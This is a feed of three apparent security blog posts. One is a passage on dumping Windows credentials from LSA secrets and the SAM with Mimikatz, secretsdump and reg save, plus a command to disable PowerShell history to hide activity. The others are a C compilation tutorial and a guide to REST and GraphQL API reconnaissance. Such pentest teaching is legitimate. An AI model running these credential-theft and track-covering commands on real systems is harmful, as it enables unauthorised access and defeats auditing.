In the labyrinth of Windows security, certain credentials are like hidden gems tucked away in the registry. These are the keys that keep the wheels of Windows turning smoothly, and they&apos;re the focus of our exploration in this section.

**LSA Credentials: The Encrypted Trove**

The Local Security Authority (LSA) secrets, stored securely on disk in an encrypted form, are a treasure trove of critical data. Let&apos;s take a peek into what these secrets hold:

-   **Active Directory Computer Account Passwords**: These are the digital ID cards for domain accounts, especially useful when the Domain Controller plays hide and seek on the network. Stored in the MSCACHEV2/MSCASH format, they&apos;re like complex puzzles that tools like hashcat can solve.
-   **Service Account Passwords**: To let a process act on a user&apos;s behalf, Windows stores these passwords, acting like backstage passes for various services.
-   **Auto-Login Credentials**: If auto-login is your thing, then these passwords might be in the LSA secrets. Alternatively, they might be hanging out under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`, right next to the DefaultUserName key.
-   **Domain Computer Account Passwords**: These change every 30 days – think of them as monthly password makeovers for security.
-   **DPAPI Master Keys**: The skeleton keys for decrypting user data, shrouded in layers of secrecy.
-   And there&apos;s more – from IIS application passwords to Microsoft accounts, it&apos;s a diverse collection.

This precious data resides in the SECURITY hive file, encrypted like a digital Fort Knox. To unlock it, you need the BootKey/SysKey, which, as we explored in Chapter 2, is found in the SYSTEM hive file. Getting to this treasure requires system-level access, and the right tools, like impacket-psexec for the tech-savvy adventurers:

```bash
impacket-psexec &lt;adminuser&gt;@&lt;ip&gt;
reg query HKLM\SECURITY\Policy\Secrets

```

![](/content/images/2023/03/secretsRegistry.png)

LSA credentials

### **SAM: The Keeper of Local Secrets**

Dive into the SAM (Security Accounts Manager) hive file in Windows, and you&apos;ll find a vault of credentials, specifically the NT hashes of local users. It&apos;s like a secret diary of the system, holding the essence of local user identities.

**Retrieving SAM Credentials Remotely**

To access this vault from afar, one can employ the tool &apos;secretsdump&apos;. It&apos;s like having a remote control to unlock these secrets:

![](/content/images/2023/03/sam.png)

SAM database dump

### **Dumping Registry Credentials with Mimikatz**

But what if you&apos;re more of a hands-on explorer? Mimikatz is your tool of choice. First, you’d need to invoke `privilege::debug` to gain the necessary access. Then, a treasure trove of commands awaits:

-   `lsadump::secrets`: This is your key to the LSA secrets.
-   `lsadump::cache`: For those cached domain logons, think of it as peeking into a hidden stash.
-   `lsadump::sam`: This fetches the local account credentials, bringing the guarded secrets of SAM to light.

![](/content/images/2023/03/mimikatzlsadump.png)

LSA dump with Mimikatz

**Local Extraction via Registry Files**

Alternatively, for a more stealthy approach, you can save the hive files and then extract the credentials using tools like secretsdump. This method mirrors the approach we explored for dumping the NTDS:

```bash
reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin

```

![](/content/images/2023/03/Pasted-image-20230217084049.png)

Saving hive files of interest

With the files in hand, run the secretsdump tool:

```bash
impacket-secretsdump -system system.bin -security security.bin -sam sam.bin LOCAL

```

![](/content/images/2023/03/secretsdumpexplained.png)

Dumping of registry credentials secrets with secretsdump

**The Revealed Secrets:**

What secrets will you uncover?

-   Credentials from SAM in LM:NT format.
-   Domain user credentials cached in MSCACHEV2/MSCASH format. To crack these, they need to be reformatted: `$DCC2$10240#username#hash`.
-   The machine password (Machine ACC), a blend of hexadecimal and LM:NT formats.
-   DPAPI\_SYSTEM keys and NL$KM, the latter used to decrypt cached domain credentials.

**Extra Tip:** For those curious about which user is running a particular service, PowerShell comes to the rescue:

```powershell
PS C:\&gt; Get-WmiObject win32_service -Filter &quot;name=&apos;mysql&apos;&quot; | select -ExpandProperty startname

```

### **PowerShell History: Unearthing Digital Footprints**

Venturing into PowerShell history is like stepping into a time machine, where each command tells a story of past explorations. This history, often overlooked, can be a goldmine of information, revealing the digital footprints left behind by users.

**Viewing the Current User&apos;s History:**

Curious about your own PowerShell journey? To take a stroll down memory lane, use this command:

```powershell
(Get-PSReadlineOption).HistorySavePath

```

This reveals the path to your PowerShell history file, a diary of your command-line adventures.

**Listing History for All Users**

But why stop at your own history? To uncover the PowerShell activities of all users on a system, this command is your key:

```powershell
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

```

It&apos;s like having a master log of PowerShell sessions, providing insights into the commands executed by every user.

**Erasing Your PowerShell Tracks:**

Perhaps you want to cover your tracks, leaving no trace of your command-line escapades. In that case, this command is your digital eraser:

```powershell
Set-PSReadlineOption -HistorySaveStyle SaveNothing

```

Executing this will ensure that your future PowerShell commands become ephemeral, disappearing like whispers after execution.

PowerShell history isn&apos;t just a feature; it&apos;s a window into the past actions of users, offering a glimpse into the patterns, preferences, and practices within the command line. Whether for curiosity, investigation, or security, understanding and managing this history is a key skill in the repertoire of any tech enthusiast or professional.

### **Exploring Alternatives for Credential Harvesting**

In the digital realm of Windows, sometimes credentials hide in plain sight, nested within scripts, applications, and various nooks and crannies of the system. For the digital treasure hunter, this calls for a specialized tool - enter laZagne.

**laZagne: The Swiss Army Knife for Credential Recovery**

Think of laZagne as a master key for uncovering hidden credentials. This versatile tool delves into the depths of your system, searching through scripts and applications where login details might be inconspicuously stored. It’s like having a digital detective at your fingertips, sniffing out passwords and usernames that are essential for accessing various resources but might have been forgotten in the maze of digital storage.

Using laZagne, you can uncover a treasure trove of credentials you didn&apos;t even know were there, making it an invaluable asset in both system administration and cybersecurity endeavors. Whether you&apos;re patching up security loopholes or simply recovering forgotten access details, laZagne offers a straightforward and efficient path to your goal.

# **Conclusions: Navigating the Complexities of Windows Security and Credential Retrieval**

Throughout this article, we&apos;ve embarked on an in-depth journey into the world of Windows security, exploring the intricate processes of authentication and credential retrieval. From the detailed workings of Windows logon and various authentication methods to the advanced techniques for extracting credentials, we&apos;ve covered a broad spectrum of security aspects in Windows systems.

We delved into the crucial roles of the Local Security Authority (LSA) and Security Accounts Manager (SAM), uncovering how they function as the gatekeepers of user authentication and access. The exploration of PowerShell history added another dimension, showing how even the most routine of actions can leave behind a trail of valuable information.

Our foray into tools like Mimikatz, secretsdump, and laZagne opened our eyes to the possibilities and risks inherent in credential retrieval. We saw how these tools could be used for both protective and investigative purposes, offering insights into securing systems as well as understanding potential vulnerabilities.

As we conclude this exploration, it&apos;s clear that the world of Windows security is a complex and ever-evolving landscape. The knowledge and insights gained here are not just about understanding how to retrieve credentials but also about appreciating the intricacies of digital security. This journey equips us with the understanding to better navigate the challenges of safeguarding Windows environments, ensuring that we stay a step ahead in the dynamic world of cybersecurity.

# References

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)</content:encoded><author>Ruben Santos</author></item><item><title>Decoding the Compiler: A Deep Dive into the Phases of C Code Compilation</title><link>https://www.kayssel.com/post/binary-3</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-3</guid><description>The C compilation process encompasses preprocessing, compiling to assembly, assembly to machine code, linking object files, and managing libraries. Symbols are key for functions and variables. Each phase contributes to creating efficient software for C programmers</description><pubDate>Fri, 24 Feb 2023 11:00:28 GMT</pubDate><content:encoded># Introduction

In our [previous chapter](https://www.kayssel.com/post/explotation-1-assembly/), we quickly touched upon the intriguing process of binary compilation. This time, we&apos;re diving deeper and getting our hands dirty with some real testing using the gcc compiler. Our goal? To understand the compilation process in its full glory, right down to the nitty-gritty details. For this adventure, we&apos;ll be working with a neat piece of C code, dissecting it through each phase of the binary compilation process. Here’s the code we&apos;ll be playing with:

```c
//main.c

#include &lt;stdio.h&gt;
#define FORMAT_STRING &quot;%s&quot;
#define MESSAGE &quot;Hello, world!\n&quot;

int main(int argc, char *argv[]) {
	printf(FORMAT_STRING, MESSAGE);
	return 0;
}

```

In this chapter, we&apos;re spicing things up by introducing two new phases: the preprocessing phase and the linking phase. So, get ready for an updated journey through the C Compilation process, where we’ll uncover more secrets and enhance our understanding of what really goes on under the hood.

![](/content/images/2023/02/compilationprocess.png)

The C Compilation process

# **The Preprocessing Phase: Setting the Stage for Code Magic**

Think of the preprocessing phase as the behind-the-scenes magic in the world of coding. It&apos;s like preparing the ingredients before cooking a meal. In this phase, what we&apos;re essentially doing is gathering all the necessary functions and macros from header files (like our good old friend `stdio.h`) and mixing them into our source code recipe. Why, you ask? Well, it&apos;s simple - our code needs these ingredients to perform functions like `printf`, the culinary equivalent of making our code &apos;speak&apos;.

![](/content/images/2023/02/carbon-1-.png)

Code sample after preprocessing phase

Let&apos;s peek into our `main.c` - notice how it&apos;s now fully equipped with all the `stdio` function headers? That&apos;s preprocessing for you, ensuring our code has everything it needs to execute successfully. Also, take a glance at how the `FORMAT_STRING` and `MESSAGE` macros are no longer just declarations; they&apos;re now part of the actual `printf` function. Pretty neat, right?

Now, how do we whip up this preprocessing magic using gcc? Just use this simple command:

```bash
gcc -E -P test.c

```

Here, `-E` is your stop sign, telling gcc to pause right after preprocessing. And `-P`? That&apos;s your neat filter, keeping those debugging messages out of your way.

So, there you have it - the preprocessing phase, where our code begins to take shape, ready for the culinary art of programming!

# **The Compilation Phase: From C to Assembly**

Welcome to the compilation phase, where our C code embarks on a transformative journey, morphing into assembly code. Imagine this phase as a meticulous translator, converting our high-level C language into a form that&apos;s closer to the machine&apos;s heart - assembly language.

But that&apos;s not all. Here, our compilers play the role of savvy editors, making optimizations to our code. These tweaks and tunings can lead to subtle yet impactful changes in the final assembly code - kind of like fine-tuning a recipe to perfection.

To navigate through this phase with gcc, we use a special set of commands:

```bash
gcc -S -masm=intel compilation_example.c

```

`-S` here is our trusty guide, ensuring that the journey ends right after the compilation, with the results neatly saved. The `-masm=intel`? That&apos;s like choosing the dialect of assembly language we prefer, opting for the Intel syntax in our case.

![](/content/images/2023/02/carbon-2-.png)

Intel Assembly Code

Now, let&apos;s peek into the world of assembly code. We don&apos;t need to dive too deep, but even at a glance, you can see the magic at work. Notice the label for our `main` function? That&apos;s our code, now in assembly attire. And look there! The string &quot;Hello, world!&quot; has its own label - `.LCO`. Drawing from our past chapters, we can even start to distinguish between the prologue and epilogue parts of a function.

# **The Assembly Phase: Crafting the Object File**

Now, we step into the assembly phase, where our code undergoes a remarkable transformation. It&apos;s like a caterpillar turning into a butterfly, but in the world of programming. Here, the assembler code, which is already close to the language of machines, is converted into pure machine code. This is the creation of what&apos;s known as the &quot;object file&quot; or &quot;module&quot;.

To bring this object file to life using gcc, here&apos;s the magic spell:

```bash
gcc -c compilation_example.c
```

The `-c` flag is our little helper in this process, dedicated to generating the object file.

But how do we really know what we&apos;ve created? Enter the `file` command, a window into the nature of our compiled file:

```bash
[rsgbengi@kaysel binary]$ file test.o
test.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped

```

And it speaks! The output tells us that `test.o` is an &quot;ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped&quot;. Let&apos;s decode this, shall we?

-   **ELF 64 bit**: Think of this as the DNA of our file – it&apos;s in the Executable and Linkable Format for 64-bit systems.
-   **LSB**: This stands for &apos;Least significant byte first&apos;, a way our data is ordered – it&apos;s the little-endian format.
-   **Relocatable**: Unlike a rigid statue, these files are flexible – they don&apos;t need a fixed spot in memory to exist. This is what sets an object file apart from an executable.

Here&apos;s the kicker: since these files are compiled independently, their memory addresses are like unknown variables during the assembly phase. That&apos;s why they need to be relocated in memory, or &apos;linked&apos;, so they can come together to form a complete executable.

So, in the assembly phase, we&apos;re not just building parts; we&apos;re preparing them for the grand assembly, where they all come together to form something greater.

# **The Linking Phase: Where Everything Comes Together**

Welcome to the grand finale of our compilation process - the Linking phase. Picture this as the moment where all the individual pieces of a puzzle find their place, creating a complete picture. In this phase, all the object files we meticulously crafted in the assembly phase are brought together, and voilà, an executable is born!

But who&apos;s the mastermind orchestrating this grand assembly? Enter the linker - the program that takes the baton from the compiler after its job is done. The linker is a bit like a conductor, seamlessly connecting various sections of an orchestra to create a harmonious symphony.

Here&apos;s where things get interesting: as the linker binds these object files, it also needs to make sense of references to variables and functions from other libraries. But there&apos;s a catch - the exact memory addresses of these functions and variables are like puzzle pieces hidden under the couch. They&apos;re unknown at this point.

This is where relocation symbols come into play. These symbols are like clues in a treasure hunt, guiding the linker on how to resolve each variable or function. When an object file depends on these relocation symbols to find its references, we call this a symbolic reference. It&apos;s a bit like saying, &quot;I know what I need, but I need some help finding out where it is.&quot;

So, in the linking phase, it&apos;s not just about bringing parts together; it&apos;s about ensuring they communicate and connect correctly, setting the stage for the final, runnable program.

![](/content/images/2023/02/symbols.png)

Symbolic reference vs relocation symbol

## **Static vs Dynamic Libraries: The Final Touch in Linking**

Once our linker has masterfully assembled all the pieces into a single executable, it&apos;s time for the grand resolution. Imagine this part as the final polish on a newly built sculpture. Here&apos;s where the magic of static and dynamic libraries comes into play.

First, let&apos;s talk about static libraries. These are like loyal friends who are always there for you. When the linker encounters references to static libraries, it resolves them completely, integrating their code directly into the executable. It&apos;s a bit like embedding all the ingredients into the cake before baking.

Dynamic libraries, on the other hand, are the social butterflies of the library world. They don&apos;t get fully resolved in the executable. Instead, they remain as symbolic references, akin to placeholders. Why? Because, unlike static libraries, dynamic libraries are loaded into memory just once, and this happens when the executable is run. It&apos;s like calling a friend to join the party at the right moment. These libraries are &apos;shared&apos; across different programs, hence the name.

![](/content/images/2023/02/staticvsdynamic.png)

Sample of resolutions

Now, to bring our compiled code to life with gcc, here&apos;s what we do:

```bash
[rsgbengi@kaysel] gcc test.c
[rsgbengi@kaysel] file a.out 
a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e10050d173339c7473395a453a2a90fd6fa868a9, for GNU/Linux 3.2.0, not stripped

```

And there it is: `a.out`, our ELF 64-bit LSB executable, dynamically linked and ready for action. By default, gcc names the output `a.out`, but if you&apos;re feeling creative, you can give it a custom name using the `-o` flag.

Let&apos;s decode the identity of `a.out`:

-   **ELF and LSB**: Just as in the assembly phase, these terms describe the format and data ordering of our executable.
-   **Executable**: It&apos;s no longer just relocatable; now, it&apos;s a full-fledged executable, ready to run.
-   **Dynamically linked**: This means our executable is using those dynamic, social libraries.
-   **Interpreter**: The dynamic linker steps in here, resolving memory addresses of functions and variables from the dynamic library.
-   **Not stripped**: The binary retains symbols, which are like helpful notes, making debugging and understanding the executable easier.

## **Symbols: The Compiler&apos;s Glossary**

In the world of programming, &apos;symbols&apos; are like the nicknames that a compiler gives to various functions and variables after it&apos;s done compiling the code. They&apos;re not just names, though. These symbols are intricately linked to their corresponding data and binary code, forming a crucial part of the program&apos;s DNA.

Imagine you&apos;ve written some C code. Now, to see these symbols in action, we can use a tool like radare2, a Swiss Army knife for reverse engineering. We&apos;ll explore radare2 more in future articles, but for now, here&apos;s a sneak peek:

```bash
rardare2 test

```

![](/content/images/2023/02/carbon-3-.png)

Symbols of the executable

Alternatively, for a more traditional route, we can turn to the Linux `readelf` command. This handy tool lets us peek into the symbol universe of our compiled code. Here&apos;s how it works:

```bash
readelf --syms test

```

![](/content/images/2023/02/carbon-4-.png)

readelf to show the symbols of the executable

Reading the output is like decoding a secret message. You&apos;ll see the main symbol, marked as a function (FUNC), and a whole list of other symbols. Some of these symbols are like mystery guests (from dynamic libraries) without established memory addresses. Others are more like permanent residents, with fixed addresses (from static libraries or the same file).

But here&apos;s a plot twist: not all symbols are crucial for the binary to function. In fact, in the shadowy world of malware, these symbols are often stripped away to make reverse engineering a headache for security experts.

Want to see how to strip symbols yourself? Just use this Linux command:

```bash
strip -s test

```

![](/content/images/2023/02/carbon-5-.png)

readelf to read the binary after removing the symbols.

After this, if you inspect the file again, you&apos;ll notice a significant part of the previous information is gone, like magic. It&apos;s now labeled as &quot;stripped&quot;, streamlined and a bit more mysterious.

![](/content/images/2023/02/carbon-6-.png)

Shows that binary has been stripped of its symbols 

# **Conclusions: Mastering the Art of Compilation**

Throughout our journey into the fascinating world of code compilation, we&apos;ve unraveled the mysteries hidden behind each line of C code. From the preprocessing phase, where we set the stage with necessary functions and macros, to the intricate workings of the compilation phase, transforming our code into assembly language, we&apos;ve seen how each step plays a pivotal role in bringing a program to life.

In the assembly phase, our code underwent a remarkable transformation into machine code, resulting in the creation of an object file. This phase highlighted the importance of understanding the low-level aspects of programming and how they contribute to the overall functionality of our applications.

The linking phase was the grand finale where all these compiled pieces came together. We explored the nuances of static and dynamic libraries, understanding their roles and how they impact the final executable. This phase emphasized the importance of efficient memory management and the role of linkers in resolving references to create a cohesive and runnable program.

Moreover, the exploration of symbols revealed the intricacies of how compilers reference functions and variables. We delved into tools like radare2 and readelf, providing a glimpse into the world of reverse engineering and the significance of symbols in understanding and debugging our code.

In essence, this article series has been a deep dive into the art of compilation, equipping you with the knowledge and appreciation of what goes on under the hood of C programming. As we conclude, remember that each phase of compilation is a step towards creating efficient, functional, and robust software. With these insights, you&apos;re now better prepared to navigate the complexities of programming, armed with a deeper understanding and a newfound respect for the compilation process.

# References

[Introduction - The Official Radare2 Book](https://book.rada.re/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring the API Realm: An Introductory Guide to Recognition in RESTful and GraphQL APIs</title><link>https://www.kayssel.com/post/api-hacking-1</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-1</guid><description>Explore the world of APIs in this series covering Restful and GraphQL paradigms. Learn about JSON, API recognition, versioning, and Introspection Query for GraphQL.</description><pubDate>Fri, 17 Feb 2023 11:00:45 GMT</pubDate><content:encoded># **Introduction: Unveiling the World of APIs**

In the ever-evolving digital landscape, Application Programming Interfaces (APIs) serve as the unsung heroes, quietly orchestrating the seamless interplay between various applications and services. These critical components underpin the vast web of modern connectivity, making them indispensable to our digital existence.

This series is crafted for enthusiasts and professionals in offensive security, diving deep into the fascinating realm of APIs. We embark on an exploratory journey through two distinct yet equally compelling API paradigms: Restful and GraphQL. Whether you are a seasoned expert in security intricacies or a curious newcomer keen to venture into this aspect of digital safeguarding, our series promises insights, engagement, and a trove of valuable knowledge.

Together, we will navigate the nuances of API identification, the importance of version management, and the potent capabilities of the Introspection Query in GraphQL. Our goal is to arm offensive security practitioners with the knowledge and tools necessary to exploit and harness these pivotal digital components effectively. Many of the techniques we&apos;ll explore throughout this series are detailed in a repository that has been a cornerstone of our discussion: [https://github.com/DeathChron/Talks](https://github.com/DeathChron/Talks). This repository not only hosts a wealth of information but also showcases the collaborative effort between myself and a friend known in the digital security community as @pwnedshell, whose insights have been invaluable.

Embark on this enlightening journey through the API landscape, where we dissect the complexities of Restful and GraphQL APIs, reveal their unique strengths and vulnerabilities, and guide you through the digital world with an informed and tactical perspective. The adventure starts here, opening doors to limitless possibilities for those adept in the craft of digital offense.

# **What is an API? The Digital Bridge of Communication**

Have you ever marveled at how different software applications talk to each other as if they&apos;re old friends? The secret lies in the world of APIs, or Application Programming Interfaces. Imagine an API as a skilled interpreter, effortlessly translating and conveying messages between your computer and a universe brimming with data sources and complex backend logic.

Here&apos;s the magic: when you shoot a request across the web, it&apos;s the API that hustles to fetch and carry back the information you seek. This digital courier typically delivers the goods in plain text, often dressed in formats like JSON (JavaScript Object Notation) or XML (eXtensible Markup Language). Of these, JSON is like the cool kid on the block – user-friendly, agile, and increasingly popular among developers for its approachability.

# **What is JSON? A Computer&apos;s Favorite Language**

Imagine a language that&apos;s music to a computer&apos;s ears – that&apos;s JSON, or JavaScript Object Notation, for you. It&apos;s the digital equivalent of a sleek sports car: fast, efficient, and easy on the eyes. JSON is a favorite in the realm of digital communication for its straightforward way of representing data in text format. To truly appreciate the elegance of JSON, let&apos;s zoom in on three of its key features:

1.  **Curly Braces – The Welcoming Gates**: Every JSON journey starts and ends with curly braces ({}). Think of these like the &apos;hello&apos; and &apos;goodbye&apos; of a conversation. They&apos;re the welcoming gates and the fond farewells of the JSON world.
2.  **Objects and Lists – The Organizers**: Nestled within these curly braces, JSON communicates using objects (enclosed in {}) and lists (encased in square brackets \[\]). This is where JSON shows its organizational prowess, neatly categorizing data for clarity and ease of access.
3.  **Key-Value Pairs – The Heart of the Matter**: At the core of JSON&apos;s communication style are key-value pairs. This is where JSON says, &quot;This is &apos;A&apos;, and it stands for &apos;B&apos;.&quot; It&apos;s a straightforward, no-nonsense approach that makes data not just orderly, but also intuitively easy for both humans and computers to understand and process.

![](/content/images/2023/01/jsonExample-1--1.png)

Example of Restful API response

‌

# **Diving into the World of APIs: Restful and GraphQL**

## **Restful APIs: The Gentle Giants of the Web World**

Restful APIs are like the gentle giants of the web programming world. They&apos;re popular for a good reason: their knack for using JSON for both sending and receiving data makes them incredibly user-friendly. Picture them as the reliable workhorses behind many web applications, structuring their requests in a way that aligns perfectly with the Create, Read, Update, and Delete (CRUD) functionalities. This isn&apos;t just about keeping things orderly; it&apos;s about making data management as smooth as a jazz tune.

![](/content/images/2023/01/CRUDExampleRest-1.png)

Restful API CRUD

## **GraphQL: The Customized Maestro of Queries**

Enter GraphQL, the maestro of custom queries. Unlike the multi-endpoint approach of its Restful counterparts, GraphQL conducts its symphony through a single endpoint. This approach is like having a genie in a bottle – depending on your query, it can conjure up a variety of data in JSON format. It&apos;s this tailored approach that makes GraphQL a hit, especially for complex applications that demand a more nuanced data retrieval. Think of GraphQL as the jazz improvisation to Restful&apos;s classic orchestra – both create beautiful music, but in very different ways.

![](/content/images/2023/01/CRUDExampleGraphql-1.png)

GrapnQL API CRUD

# **Restful API vs GraphQL: Understanding the Key Differences**

Now that we&apos;ve introduced the two heavyweight champions in the API arena – Restful and GraphQL – it&apos;s time to dive into what really sets them apart. At their core, these two models approach the task of data handling in distinct ways, each with its own set of strengths and challenges.

## **GraphQL: The One-Stop Shop**

Imagine walking into a store where you can get everything you need in one go. That&apos;s GraphQL for you. It operates through a single endpoint, a one-stop shop where clients send their data requests. The beauty of this approach? It&apos;s incredibly efficient. You ask for exactly what you need, and GraphQL delivers just that, nothing more, nothing less. This tailored response mechanism can lead to better performance, especially for complex queries.

## **Restful APIs: The Diverse Marketplace**

In contrast, Restful APIs are like a bustling marketplace with different stalls for different needs. Each endpoint in a Restful API is designed for a specific action. Want to read data? There&apos;s an endpoint for that. Update something? There&apos;s another endpoint waiting for you. This division allows for a clear, organized structure where each endpoint knows its job.

## **The Trade-Off: Simplicity vs. Flexibility**

However, with great power comes great responsibility. The single endpoint design of GraphQL, while flexible, adds layers of complexity. It&apos;s like having a conversation where you need to be very specific about what you ask for. Get it right, and you&apos;re golden. But any ambiguity can lead to errors or unintended results. Restful APIs, with their multiple endpoints, might seem less efficient, but this separation can make them more straightforward and less prone to errors in specific scenarios.

![](/content/images/2023/01/graphqlvsrest.png)

RestFul vs GraphQL

# **Restful APIs Recognition: Mastering the Art of API Exploration**

When it comes to understanding Restful APIs, think of it as a detective game where the goal is to gather as much information about your target as possible. Here are four essential steps to become an API sleuth:

## **API Documentation: The Treasure Map**

Just like a treasure map, API documentation is a goldmine. It often lists endpoints and provides detailed instructions on how to interact with the API. Hunting for specific API documentation? Turn to Google with keywords like &quot;\[target\] developers docs&quot; or &quot;\[target\] API&quot;. This is often your first step in understanding the API landscape you&apos;re exploring.

## **Crawling the Webpage: The Explorer&apos;s Tool**

Next, think like an explorer. Use web crawling – a technique where software collects all existing links on a webpage. This is crucial for uncovering hidden API endpoints. Tools like Burp&apos;s crawler are perfect for this task. As you navigate through the target&apos;s pages, Burp collects data, which you can later analyze in the &apos;Site Map&apos; section.

![](/content/images/2023/01/image-38.png)

Site Map created using Burp&apos;s crawler

## **Guessing Existing Resources: The Art of Fuzzing**

Now, put on your detective hat and start guessing the resources an API might have. This is where &apos;fuzzing&apos; comes in – using lists of common words in APIs to discover potential resources. Resources like SecLists and Assetnote&apos;s wordlists are invaluable here. They offer a curated collection of terms frequently used in API hacking, helping you uncover hidden or undocumented aspects of the API.

-   SecLists: [SecLists/Discovery/Web-Content/api at master · danielmiessler/SecLists](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/api)
-   Assetnote Wordlists: [Assetnote Wordlists](https://wordlists.assetnote.io/)

## **Utilizing Burp&apos;s Intruder for Fuzzing**

Finally, it&apos;s time to get hands-on with Burp&apos;s Intruder tool. This tool allows you to select specific parts of the API and test them using your chosen wordlists. It&apos;s a powerful way to actively probe and understand the API&apos;s structure and potential vulnerabilities.

![](/content/images/2023/01/image-40.png)

Selection of the part to be fuzzed

![](/content/images/2023/01/image-39.png)

Results after fuzzing

## **API Versioning: Navigating Through Time and Changes**

The final piece of our API exploration puzzle is understanding API versioning. It&apos;s like having a time machine for APIs, where each version can tell a different story, especially in terms of functionality and security.

### **Why Versioning Matters**

Imagine an endpoint in an API – let&apos;s say, one that&apos;s used for changing a user&apos;s password. In its latest version, this endpoint might be fortified against vulnerabilities. But what about its earlier versions? There could be a version out there, less secure, like a door left slightly ajar. This is where the importance of API versioning shines. It&apos;s crucial to identify if there are different versions of the same endpoint, each with its own set of functionalities and security features.

### **The Art of Enumerating Versions**

To effectively map out these versions, you can employ the techniques of webpage crawling and fuzzing, as discussed earlier.

1.  **Webpage Crawling**: By crawling through the webpages of your target API, you can uncover various versions of endpoints. This process can reveal the evolution of the API, showing how endpoints have changed over time.
2.  **Fuzzing**: This technique allows you to test different endpoints for various versions. By applying fuzzing, you can discover how the same endpoint behaves across different versions of the API. It&apos;s like testing each door to see how securely it&apos;s locked.

Having a comprehensive list of endpoints for each version of the API you&apos;re investigating is like having a detailed map of a treasure island. It guides you to understand not just where the vulnerabilities might be, but also how they have been addressed over time.

In summary, API versioning is not just about keeping up with changes; it&apos;s about understanding the history and evolution of an API&apos;s security and functionality. As we wrap up our journey through the world of APIs, remember that each version has its own story to tell, and it&apos;s up to us to listen and learn.

![](/content/images/2023/01/versionapi-1.png)

API versioning

# **Recognizing GraphQL APIs: A Step Towards Simplified Testing**

When it comes to recognizing GraphQL APIs, the process is somewhat streamlined compared to Restful APIs, thanks to a variety of specialized tools and techniques at our disposal.

## **Detecting GraphQL: The Tools of the Trade**

### **Using a Crawler**:

Just like with Restful APIs, a crawler can be a handy tool. The Burp Suite crawler, for instance, can be effectively used to detect GraphQL endpoints. It&apos;s like using a digital magnifying glass to scrutinize the web application&apos;s structure

![](/content/images/2023/01/image-41.png)

### **Specialized Tools - graphw00f**:

For a more GraphQL-focused approach, tools like graphw00f come into play. Designed specifically for GraphQL recognition tasks, graphw00f can efficiently identify GraphQL usage within a web application.

![](/content/images/2023/01/image-31.png)

### Fuzzing for endpoints

If the endpoint still eludes you, fuzzing remains a reliable fallback, similar to the approach in Restful APIs. However, the choice of wordlist shifts to cater to GraphQL&apos;s structure. A recommended resource is the SecLists&apos;s GraphQL wordlist, which can be found here: [SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).

[SecLists/graphql.txt at fe2aa9e7b04b98d94432320d09b5987f39a17de8 · danielmiessler/SecLists](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt)

## **Fingerprinting GraphQL: Digging Deeper**

Beyond just detection, graphw00f can also be used for &apos;fingerprinting&apos; GraphQL. By using its &quot;-f&quot; parameter, you can glean insights into the technology and the specific GraphQL engine being used by the application.

![](/content/images/2023/01/image-32.png)

## **Integrating with Burp Suite for Enhanced Testing**

For a more hands-on testing experience, integrating GraphQL testing into Burp Suite is advisable. This involves installing the InQL extension, which simplifies the process of crafting and sending GraphQL queries, particularly useful when working with the Repeater tool. To set this up, you&apos;ll need to first install Jpython, a Java implementation of Python, and then proceed to add the InQL extension via the Burp Suite&apos;s BApp Store.

![](/content/images/2023/01/image-54.png)

![](/content/images/2023/01/image-53.png)

Select as python environment Jpython

![](/content/images/2023/01/image-86.png)

Install the plugin

## **Introspection Query: Unveiling the Depths of GraphQL**

In the world of GraphQL, one of its most enlightening features is the &quot;Introspection Query.&quot; But what exactly is this powerful tool?

### **Understanding Introspection Query**

Introspection Query is like having a detailed map of a treasure island. It allows you to ask the API, &quot;What resources do you have?&quot; This query reveals the available queries, types, fields, and directives in the current API schema. It&apos;s a way to understand the structure and capabilities of the API from the inside out.

### **Executing an Introspection Query with Burp and GraphQL**

Imagine you&apos;re a digital archaeologist. You&apos;ve just found a way to unearth the secrets of a GraphQL API. Using tools like Burp Suite, you can send an Introspection Query to the API. Here&apos;s how it works:

1.  Capture a request with Burp that involves GraphQL.
2.  In the InQL tab (after installing the InQL extension), paste your Introspection Query. This query can be sourced from resources like PayloadAllTheThings.

![](/content/images/2023/01/image-33.png)

Sample request using GraphQL

![](/content/images/2023/01/image-34.png)

Paste our Introspection query in the InQL tab

### **Deciphering the Response**

The response to an Introspection Query is a treasure trove of information, albeit in a complex JSON format that might seem like a cryptic ancient script. How do you make sense of it?

![](/content/images/2023/01/image-35.png)

Sample of the response to the request

### **Enter GraphQL Voyager**

This is where GraphQL Voyager becomes your Rosetta Stone. By pasting the JSON response into GraphQL Voyager, you can transform this dense information into a visually understandable format. It&apos;s like turning a dense, unreadable manuscript into an easy-to-navigate map.

![](/content/images/2023/01/image-36.png)

Sample of pasting the answer in GraphQL voyage

![](/content/images/2023/01/image-37.png)

More visual response

### **Visualizing API Requests with InQL Scanner**

To further enhance your understanding, the InQL Scanner in Burp Suite can be used. This tool visually represents all possible requests, turning the abstract data from your Introspection Query into a more tangible and comprehensible format.

![](/content/images/2023/01/image-81.png)

InQL Scanner

# Conclusions: **Charting New Frontiers in API Mastery**

As we conclude our expedition into the realms of Restful and GraphQL APIs, we emerge with a deeper understanding of their intricacies and capabilities. Just as explorers map uncharted territories, we&apos;ve navigated the complexities of API recognition, versioning, and the invaluable Introspection Query.

